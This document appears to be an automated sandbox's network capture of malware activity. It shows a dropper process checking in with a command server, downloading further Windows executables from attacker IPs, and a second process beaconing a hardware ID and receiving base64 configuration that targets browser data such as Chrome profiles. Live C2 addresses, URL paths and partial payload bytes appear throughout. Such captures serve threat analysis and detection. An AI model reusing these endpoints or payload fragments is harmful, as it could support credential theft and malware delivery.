Nov 4, 2024 17:32:15.769891024 CET	1236	IN	Data Raw: a8 6c 30 42 cb 15 a3 b5 08 38 47 da 88 03 74 f4 c6 85 53 b4 8c 88 93 5a 0a 71 24 3d 74 c7 f5 6d 30 68 f0 34 50 92 e1 15 dd fa a7 cd 0e 87 33 6d 15 e8 61 6c 16 85 2a ef 08 1f 82 8e 17 83 94 91 7d 7f 0d d8 89 5b 3a db 37 91 22 58 02 1d ab 1e 53 53 Data Ascii: l0B8GtSZq$=tm0h4P3mal*}[:7"XSS`JlRjCoKd4@En7N0DN.Q/ 8n<:!wBM\|P0w6W<11l#v/lGKP+<0XIl.RJ
Nov 4, 2024 17:32:15.769906998 CET	848	IN	Data Raw: bc 4a 61 ab 49 ea 79 9a 16 98 00 70 c8 5e c0 a6 1c 2e 50 d9 8e 4b 37 d2 f8 5b 48 e0 f8 37 dc 5f 93 c1 99 0e 19 60 cf 91 ba 1c 52 fb db 12 49 ad ca 35 24 3f 1c 0a dc 6e 4a 09 33 c2 e5 a5 f5 8c 40 65 da a1 51 66 2b 94 d5 7a 52 5f bc 64 c7 9a 96 e1 Data Ascii: JaIyp^.PK7[H7_`RI5$?nJ3@eQf+zR_d-PUgQ9;bp$gf,-ST!75XUqN/`(.ZeSxa[fp-1}4py\|:f= N!)weHFY5{ {>Qy;kr,a
Nov 4, 2024 17:32:15.770059109 CET	1236	IN	Data Raw: 9e 7e 61 4e 18 6a 71 49 69 a6 d0 f5 58 7b 43 17 89 3b eb 0f 45 0a d5 7c ac dd 18 b5 25 cd 20 78 d1 85 bc 0d f2 7e aa d1 88 94 67 0d 6b b8 b3 39 19 a0 eb d4 ee 2e b9 5e e9 1b 78 1c cc 38 b3 4b f2 9d aa 9c b0 36 b4 10 38 fb 6d 5b 1a b7 0a 99 39 d0 Data Ascii: ~aNjqIiX{C;E\|% x~gk9.^x8K68m[92I@B"(5;+9+Fw >bcs22Fg1Y,K30AV7$/(+7$o%#_zb"xe,BI~.4)a/*
Nov 4, 2024 17:32:15.770081997 CET	1236	IN	Data Raw: 37 df 60 4c c8 77 18 da cb e7 de 6b 5a f1 b4 ef e5 7c cb 49 61 02 c7 c4 dd c4 c2 1b 2a 91 58 e1 8e 22 37 f0 d3 69 68 6a c8 1c 29 19 df d9 24 4e ff 7d 91 0e 0d 95 21 53 7d 5f 62 18 08 5a 8f da b6 e8 a8 ce 0d ad af cf 79 fe 24 d2 3e 05 26 3e 91 f3 Data Ascii: 7`LwkZ\|Ia*X"7ihj)$N}!S}_bZy$>&>K62\|4:/.$[5\`@2du0]8}q\|y/=+{uSP/f(u^]50? zVt'Tb;h>nwkkYGU
Nov 4, 2024 17:32:15.774944067 CET	1236	IN	Data Raw: 4c 1a c2 bd 22 ce 37 57 1e 76 1a df e7 8f 28 22 d2 92 1d 41 f2 68 19 4d 02 f4 6f 15 af f4 7a a3 cf 1f 9c 2a 2d 4e 91 df e0 39 a2 16 e1 4b 1b 37 0c 40 94 65 24 d1 43 27 52 57 d2 c1 dd 88 9a 72 be d9 30 cf 2a d0 a5 07 e4 9e df f5 cf 15 25 90 00 d3 Data Ascii: L"7Wv("AhMoz-N9K7@e$C'RWr0%0y]NsWCOL7'f~HI/}SkB`LMD7!Oz*y1V`5c~c$5N}Pmbu0A\|<C0w$0)8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50000	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:24.122792959 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 38 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003896001&unit=246122658369
Nov 4, 2024 17:32:25.034826040 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50002	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:25.043210030 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 4, 2024 17:32:25.963031054 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:25 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:32:25.963063955 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:25.963079929 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:25.963100910 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:25.963112116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:25.963123083 CET	1236	IN	Data Raw: 04 fc e3 93 a7 b1 ff cb 31 3c 1f 7c db 2e 01 3b c6 60 20 02 2f 7e c6 19 80 a3 9b 2f 74 d0 35 73 1b de dd 1e b2 4f 80 e8 63 b1 08 4b f9 6b 84 21 9b 8f f7 c1 d7 a6 fa 01 59 c7 9d f4 16 b0 35 0a f8 e9 c1 4c 35 37 42 b9 3c 1c 66 82 f0 ec b8 b0 f7 2f Data Ascii: 1<\|.;` /~/t5sOcKk!Y5L57B<f/^_N"Y8!^0X;FEHN;n@Vs%cqao,`uT!WI81uVol&7&7&7&7&7&7&7&7&A\|;7^!r,9)o
Nov 4, 2024 17:32:25.963135958 CET	848	IN	Data Raw: 99 99 4b 01 26 f7 d2 27 b6 78 2c 70 4f 9f ab 7a 54 1b 41 c0 f5 ab 68 28 bf f3 bc 18 06 59 49 5a 5e 6b 68 ec be be 75 95 3b b4 18 93 ad b3 59 1f db 84 66 50 bf e9 3c d0 f9 c8 61 0f 2b 67 70 11 f6 d5 80 20 08 67 28 a1 e7 36 6c 94 7c 41 33 8c 20 2c Data Ascii: K&'x,pOzTAh(YIZ^khu;YfP<a+gp g(6l\|A3 ,\5\|5VWR#3P3p.4g2uDuP+~R%ef'"dJ8 s(/c.#5t\|Cw3ysA"#4W@tqCp@ vzP
Nov 4, 2024 17:32:25.963237047 CET	1236	IN	Data Raw: fa 0c fc 17 27 e7 5f 0c cf 43 3e 54 48 df 84 28 92 c8 bc 2f 26 d3 6f 7b 10 ff 9f 51 ae d0 f5 28 97 37 38 29 31 4f 66 29 86 98 8a 23 ee ef 38 23 58 6f 2b 20 72 2f 84 f1 c9 0e 42 15 ee 87 2b f4 a1 ea a0 30 22 c7 78 51 46 03 60 30 bc 49 2b 52 6a 0a Data Ascii: '_C>TH(/&o{Q(78)1Of)#8#Xo+ r/B+0"xQF`0I+RjF()7-N).C@S:\/',7e/K&&Gf)#H)n2Xe+fI+kdw;3&R$+kW>)e)~~?R1e"k2`jB
Nov 4, 2024 17:32:25.963258982 CET	1236	IN	Data Raw: b1 ef 3c 34 d6 a0 32 20 59 ef 0a 7b fa b0 22 29 55 9c 2b e4 88 9d 2f f0 26 c8 cf 20 6c 70 44 40 52 af f6 98 fd 59 ff cc 0f a0 1f d4 aa d7 0b 29 e2 2b 61 b4 fc d3 2a 15 ee e5 2a 64 2f 16 28 c4 88 b6 0b e0 26 03 a0 4e c8 ce 4b 0a 32 17 2b 31 7e 98 Data Ascii: <42 Y{")U+/& lpD@RY)+a*d/(&NK2+1~B%.gXGW+Rj]{14c>6IX /QpOY1c>KO0._+G`o?'YO'on&G2*7(+f&7B
Nov 4, 2024 17:32:25.963269949 CET	424	IN	Data Raw: 16 04 15 18 d5 a0 33 74 96 aa be 4b 91 e8 fb af 26 e5 77 20 3c ad 9b cf d6 ac 87 c7 15 a0 db 4b 73 f5 f3 80 95 1b ec 28 ff 8f 33 c4 58 7b e2 18 ee 7f 2b 0c e2 c1 84 95 e7 cf 10 fe 01 c1 5d 2c 27 98 9d cb 49 0d d8 67 06 48 2b 58 16 f8 99 5a 9e b5 Data Ascii: 3tK&w <Ks(3X{+],'IgH+XZg?/vy:fF"3Gf{&?G8Xo+ j+Rtw+{.$#5H/P_3_Xk1fG`K*U>KSP',~=c)11vp"y
Nov 4, 2024 17:32:25.968806982 CET	1236	IN	Data Raw: 36 c8 d3 20 06 6e 6c ee 20 d7 cb 28 22 90 36 27 06 73 37 8e ff 97 65 52 2a c6 21 98 15 11 40 38 00 bb 33 f5 23 33 57 9c 89 2d 64 29 2e d7 9b db 42 e3 ba 56 96 e5 5b 29 2f 3e dd c3 50 67 34 52 ae a0 04 b2 b0 57 98 17 a6 48 2b b8 15 30 9a 54 2a 91 Data Ascii: 6 nl ("6's7eR!@83#3W-d).BV[)/>Pg4RWH+0T&/fX'p\|`FR0l)33r1(Kc\&(&+`t4E'/opG(>EW)v3({3X'B_}.0RT')fPoA+fP&20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50014	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:32.918128014 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 38 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003897001&unit=246122658369
Nov 4, 2024 17:32:33.841298103 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50016	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:33.848727942 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 4, 2024 17:32:34.762984037 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:34 GMT Content-Type: application/octet-stream Content-Length: 919552 Last-Modified: Mon, 04 Nov 2024 15:50:39 GMT Connection: keep-alive ETag: "6728ed4f-e0800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 ed 28 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELG(g"Xw@`7@@@d\|@(u4@.text `.rdata@@.datalpH@.rsrc(@@@.relocuv@B
Nov 4, 2024 17:32:34.763020039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Nov 4, 2024 17:32:34.763041019 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Nov 4, 2024 17:32:34.763071060 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Nov 4, 2024 17:32:34.763083935 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Nov 4, 2024 17:32:34.763097048 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Nov 4, 2024 17:32:34.763109922 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Nov 4, 2024 17:32:34.763226986 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Nov 4, 2024 17:32:34.763237953 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Nov 4, 2024 17:32:34.763248920 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Nov 4, 2024 17:32:34.768174887 CET	1120	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50017	185.215.113.206	80	2472	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:33.995003939 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:32:34.905663967 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:35.096203089 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"tale------HJJEHJJKJEGHJJKEBFBG--
Nov 4, 2024 17:32:35.392249107 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 45 77 4d 44 45 78 5a 57 49 31 59 32 49 34 4d 7a 6b 7a 5a 6a 52 69 59 6a 4e 6a 5a 6a 5a 6a 4e 54 55 35 4f 54 45 30 4e 7a 45 78 4f 54 67 7a 4f 44 59 30 4d 6a 5a 69 4e 44 6c 6b 5a 44 63 33 4f 57 56 6a 4d 54 41 35 4d 47 59 34 59 54 67 78 4d 47 4e 6d 59 6a 63 77 5a 54 59 78 5a 6d 45 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YmEwMDExZWI1Y2I4MzkzZjRiYjNjZjZjNTU5OTE0NzExOTgzODY0MjZiNDlkZDc3OWVjMTA5MGY4YTgxMGNmYjcwZTYxZmEzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 4, 2024 17:32:35.398777962 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJ Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="message"browsers------KKKJEBAAECBGDHIECAKJ--
Nov 4, 2024 17:32:35.683887005 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: 